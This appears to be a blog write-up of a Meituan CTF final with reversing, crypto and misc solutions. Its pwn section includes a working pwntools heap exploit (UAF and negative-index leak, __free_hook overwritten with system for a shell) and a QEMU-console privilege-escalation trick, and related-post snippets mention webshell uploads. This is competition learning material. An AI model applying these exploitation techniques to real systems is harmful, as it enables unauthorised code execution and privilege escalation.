美团CTF个人决赛WP

于 2024-09-25 15:00:00 发布
阅读量320 收藏 3
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Palpitate_LL/article/details/142460520
版权

Reverse

ROP

解析data的ROP,一点一点还原

from pwn import *
opcode = open('data', 'rb').read()
opcode_gadget = opcode[0x30+8:]
for offset in range(0, len(opcode_gadget), 8):
    print(f'{hex(u64(opcode_gadget[offset:offset+8]))}')

提取出来密文,转成64位的

cipher = [0x98, 0x7A, 0xDF, 0x57, 0xC6, 0xE3, 0x18, 0xC7, 0x11, 0x07, 0xC7, 0xD4, 0x02, 0xD2, 0x9E,
          0x43, 0x3A, 0xCE, 0x32, 0x04, 0x33, 0x2D, 0x30, 0x30, 0xAB, 0x03, 0x84, 0xB2, 0xA9, 0x09, 0xAA, 0x40]
cipher=[int.from_bytes(bytes(cipher[i:i+8]), 'little')  for i in range(0,32,8)]

分析gadget都是通过设置rax和参数寄存器,然后call rax触发函数,函数只有4种

地址效果0x4011D6异或两个64bit0x401233变种的异或,配合0x4011d6就是swap0x401332两个64bit相减0x4013EE检查输入是否满足uuid格式0x401480提取uuid中32位字符到bss段数组0x40125D两个64bit相加

流程是一开始将一个32位字符放到bss段中,这个bss贴近我们输入放入bss段的位置,参与到运算

然后开始rop链,读取42个字符,提取uuid中32位字符,进行加密运算,运算的最后一部分是swap的操作,测试得知顺序改变为[2,3,0,1]

最后对比密文跳转结果

照着指令写一个逆回来的过程

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
uint64_t bss_flag[] = {3472325009839672890, 4659547388917318571, 14346467054006008472, 4872562756463036177, 3545518422457791288, 3689401600665085541, 3906648618554712880, 7004559110426617186};
void add(int i,int j){
    bss_flag[i] -= bss_flag[j];
}

void sub(int i,int j){
    bss_flag[i] += bss_flag[j];
}

void xor1(int i,int j){
    bss_flag[i] ^= bss_flag[j];
}

int main(){
    sub(0x0,0x7);
    add(0x1,0x5);
    sub(0x3,0x7);
    add(0x0,0x5);
    add(0x0,0x7);
    sub(0x3,0x7);
    add(0x0,0x5);
    xor1(0x2,0x5);
    xor1(0x2,0x5);
    sub(0x3,0x7);
    sub(0x2,0x6);
    xor1(0x0,0x7);
    add(0x2,0x4);
    add(0x1,0x4);
    xor1(0x1,0x7);
    xor1(0x0,0x7);
    sub(0x0,0x5);
    sub(0x0,0x7);
    sub(0x0,0x5);
    add(0x1,0x7);
    xor1(0x1,0x5);
    add(0x1,0x6);
    sub(0x1,0x4);
    xor1(0x2,0x4);
    add(0x1,0x4);
    sub(0x0,0x6);
    sub(0x2,0x7);
    add(0x1,0x6);
    sub(0x2,0x5);
    add(0x0,0x7);
    xor1(0x3,0x6);
    add(0x2,0x4);
    xor1(0x0,0x6);
    xor1(0x0,0x5);
    xor1(0x3,0x7);
    xor1(0x0,0x4);
    xor1(0x2,0x5);
    xor1(0x2,0x6);
    xor1(0x2,0x6);
    xor1(0x3,0x4);
    xor1(0x0,0x7);
    xor1(0x2,0x5);
    xor1(0x0,0x4);
    xor1(0x3,0x5);
    xor1(0x1,0x6);
    xor1(0x3,0x7);
    xor1(0x0,0x4);
    xor1(0x1,0x4);
    xor1(0x2,0x7);
    xor1(0x1,0x7);
    xor1(0x0,0x4);
    xor1(0x2,0x6);
    xor1(0x0,0x5);
    xor1(0x1,0x7);
    xor1(0x0,0x5);
    xor1(0x0,0x4);
    xor1(0x3,0x6);
    xor1(0x1,0x7);
    xor1(0x2,0x5);
    xor1(0x0,0x7);
    xor1(0x0,0x7);
    xor1(0x2,0x4);
    xor1(0x3,0x4);
    xor1(0x3,0x7);
    printf("%s",(char *)bss_flag);
    // flag{eb4781b3-e3c5-475e-8af4-2fa50468f485}
}

crackme

go语言,一开始我ida还f5反编译不了,换了个才可以,难顶

直接sm4加密和rc4,sm4密钥写死在代码里

rc4的key在linese.txt里,密文也在里面

exp:

from binascii import unhexlify
from Crypto.Cipher import ARC4
from sm4 import SM4Key

c= unhexlify(b'cc53de43058c79e4e13dbfe4e1ece82ec7d70b0fe460d50a6e2dfbbdac0b22173124ac7dee560b026b9b4cf1394c9493ad62874b4ef2125bbe27f99827d2a801b1b994c90bc31caea1cc9dc09362b518')
key = b'd0cac74c1bbeea071817360e491585e8'
cipher = ARC4.new(key)
m = cipher.decrypt(c)
key0 = SM4Key(b'xc08asb890ajds0a')
print(key0.decrypt(m))

Misc

What is that

stegsolve直接切换几个通道就可以看到

pwn

hello

直接网上查到kernel pwn qemu 的非预期

ctrl+a然后c进入shell,cat flag没有权限,要再提权,删除/sbin/poweroff然后exit就可以到su权限,再cat flag就可以

heap

一个UAF+数组上溢出

这里可以输入负数,可以数组溢出就可以往上泄露地址,泄露出程序基地址后再相同手法修改free_hook就可以。

from pwn import *
context.log_level='debug'
#p=process('./pwn')
p=remote('47.95.8.59',42283)
elf=ELF('./pwn')
#libc=ELF('/usr/lib/freelibs/amd64/2.27-3ubuntu1.5_amd64/libc.so.6')
libc=ELF('./libc.so.6')

def add(size):
    p.sendafter(b'>\n', b'1')
    p.sendafter(b'add?\n', str(size).encode())

def dele(index):
    p.sendafter(b'>\n', b'2')
    p.sendafter(b'up?\n', str(index).encode())

def edit(index,size,content):
    p.sendafter(b'>\n', b'3')
    p.sendafter(b'write?\n', str(index).encode())
    p.sendafter(b'write?\n', str(size).encode())
    p.sendafter(b'Content:', content)

def show(index):
    p.sendafter(b'>\n', b'4')
    p.sendafter(b'review?\n', str(index).encode())

show(-11)
p.recvuntil('Content:')
probase=u64(p.recv(6).ljust(8,b'\x00'))-0x4008
arraddr=probase+0x4060
add(0x10)
add(0x10)
add(0x10)
dele(0)
dele(1)
dele(2)
edit(1,8,p64(arraddr))
add(0x10)
add(0x10)
add(0x10)
edit(2,8,p64(probase+elf.got['puts']))
show(0)
libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.symbols['puts']
free_hook=libc_base+libc.symbols['__free_hook']
system=libc_base+libc.symbols['system']
edit(2,8,p64(free_hook))
edit(0,8,p64(system))
add(0x10)
edit(3,8,b'/bin/sh\x00')
dele(3)
p.interactive()

https://tttang.com/archive/1411/#toc_urlclassloader https://goodapple.top/archives/1749

Palpitate_LL
关注
[HMGCTF2022]wp
Huamang的博客
03-24 4163
WEB Fan website 首先是一个www.zip的源码泄露,是laminas框架 mvc的框架首先就是看路由 在\module\Album\src\Controller\AlbumController.php里面有功能点 <?php namespace Album\Controller; use Album\Model\AlbumTable; use Laminas\Mvc\Controller\AbstractActionController; use Laminas\View\Mode
[CTF]2022美团CTF WEB WP
Sapphire037的博客
09-18 3651
2022美团CTF的WEB方向Write up
2022美团CTF个人决赛WP
蚁景网安学院
10-11 2509
2022年美团CTF个人决赛Writeup:解析data的ROP,一点一点还原;提取出来密文,转成64位的;分析gadget都是通过设置rax和参数寄存器,然后call rax触发函数,函数只有4种;流程是一开始将一个32位字符放到bss段中,这个bss贴近我们输入放入bss段的位置,参与到运算...
2024年网络安全最新CTF_WP-攻防世界web题解
最新发布
2401_84215240的博客
08-15 1467
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
ctf wp
qq_63267612的博客
04-03 2924
文章目录被嗅探的流量镜子里的世界隐藏的钥匙另外一个世界神秘龙卷风[第一章 web入门]常见的搜集web签到 被嗅探的流量 下载后打开题目没有思路,查看别人的wp发现是文件传输找POST的包,用wireshark追踪http流量 http.request.method==POST在文件末尾找到flag 镜子里的世界 打开后是一张图片,隐写套路,查看属性,用winhex打开都没发现什么有用的信息,这时注意到图片名steg想到了用stegslove打开图片,查看图片并没有发现有用的信息,调整后发现flag 隐
VishwaCTF 2022 部分wp
qq_61768489的博客
03-22 3917
学长推荐的一个相对平易近人的ctf,对我这种菜鸡友好一点, 就想着web要多写几道出来毕竟简单的比赛不常见, 继续加油积累经验吧 My Useless Website 一个最简单的sql 万能密码注入 Stock Bot 注意源码,有hint, 主要就是注意到这个提示了,根据路径直接查Flag Hey Buddy! 这题考点是SSTI ,大佬们也许一眼就看出来了,所谓经验重要性 我这里也就是猜的,然后看到这里get传入name,就很可能 所以先尝试一下...
ctf wp 汇总
freshfox的博客
07-06 1150
ctf
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
第四届2021美团网络安全 MT-CTF writeup
ShenZ的博客
12-12 5872
第四届2021美团网络安全 MT-CTF 文章目录第四届2021美团网络安全 MT-CTFMISCUn(ix)zip오징어 게임 鱿鱼游戏BoomCryptoSymbol MISC Un(ix)zip flag{Welc0me_Unz1p_Wonder4} 오징어 게임 鱿鱼游戏 7-zip可以看到加密算法ZipCrypto Store 再加上备注里提示flagornot.txt,采用明文爆破 明文爆破参考:https://blog.csdn.net/q851579181q/articl
CG-CTF——WP(WEB[一])
hahaha233330的博客
12-03 1329
CG-CTF——WriteUp(一) 工具: ①Winhex:图片隐写工具,可通过搜索“ctf”“CTF”“key”“flag”等关键字得到flag。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明: 1、签到题 直接F12查看源代码就可以得到flag...
2022NepCTF部分WP
XINO
08-04 3449
发现是个压缩包套娃,用010看见一个流量包,直接选中数据的硬生生的提出来,虽然损坏了但是流量包可以打开,接下来发现是个键盘流量,用工具一把梭。分别作为p,q,用得到的p,q与c_mod_p,c_mod_q代入CRT方程,x等于c mod p,c 就恒等于 x % mi,.osu后缀,查了下发现是音游的文件,放软件里进行挑战,发现谱面里描出来了flag。根据旁边的如家酒店,我们用谷歌地图搜一下海南地区的如家,发现举例的一个跟图片上一样。B站直播说是最近的模板注入漏洞,就简单搜了一下,还真找到了。...
CTF-show部分wp
鹧鸪的起点
04-02 378
ctfshow愚人杯部分wp
CTF练习题WP1
m0_73891130的博客
03-25 653
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
第二届网刃杯CTF-wp
qq_45603443的博客
04-26 848
第二届网刃杯CTF-wpWebez_javaezjsSign_inuploadReez_algorithm定时启动Re_functionfreestyleMisceasyiecTip Web ez_java package me.su; import org.springframework.expression.common.TemplateParserContext; import org.springframework.expression.spel.standard.SpelExpressionPar
NepCTF2022 WP
Pysnow's Blog
07-20 2425
NepCTFWriteUp
Winja CTF | Nullcon Berlin 2022 wp
mumuzi的博客
04-09 6140
Winja CTF
BugkuCTF wp
lnjoy
02-11 1001
MISC 签到题 扫码关注微信公众号即可获得flag 这是一张单纯的图片 用UE打开如图,在ascii码最下面发现一串编码,发现是字符实体编码。 https://www.qqxiuzi.cn/bianma/zifushiti.php 网站在线解码可得flag 隐写 打开图片,先用stegsolve跑一边没有发现什么,LSB也没有什么,用UE打开也没有什么奇怪的。用binwalk跑一边,没有隐藏文...
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 5092
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
ctfhub 全部WP
09-22
引用:MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。 它是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类。 常见的MME类型,例如:   超文本标记语言文本 .html,html text/htm   普通文本 .txt text/plain   RTF文本 .rtf application/rtf   GIF图形 .gif image/gif   JPEG图形 .jpg image/jpeg 上传包含一句话木马的php文件,然后使用burp抓包,修改数据包的content type为image/gif(注意是第二个content type)发送到repeater修改后,点击send,然后放包,即可显示上传php文件成功后的相对路径。使用蚁剑连接该一句话木马即可获得flag。 文件头检查 。 引用: htaccess 查看网页源码,可以看到常用的文件后缀都被禁用。根据题目的提示,.hatccess文件【.htaccess是Apache服务器的一个配置文件。它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】 前提:mod_rewrite模块开启,配置文件中LoadMoudle rewrite_module module modules/mod_rewrite.so AllowOverride All,配置文件中AllowOverride All (如果可能做题过程中结果出现问题,但步骤正确,可以看看前提是否正确) 。 引用:文件头检验 是当浏览器在上传文件到服务器的时候,服务器对所上传文件的Content-Type类型进行检测。如果是白名单允许的,则可以正常上传,否则上传失败。 当我们尝试上传一句话木马的php文件,出现了正确后缀类型的弹窗。使用010editor制作一张图片木马,上传时使用burp抓包把文件后缀改为php,然后点击send。使用蚁剑连接php文件,即可在对应目录下找到flag。 00截断 。 关于ctfhub的全部WP,很抱歉我无法提供相关信息。由于ctfhub是一个综合性的CTF平台,涵盖了大量的题目和解题思路,每个题目的WP都有着不同的内容和解法。如果您对特定的题目或解题方法感兴趣,我可以为您提供更多信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值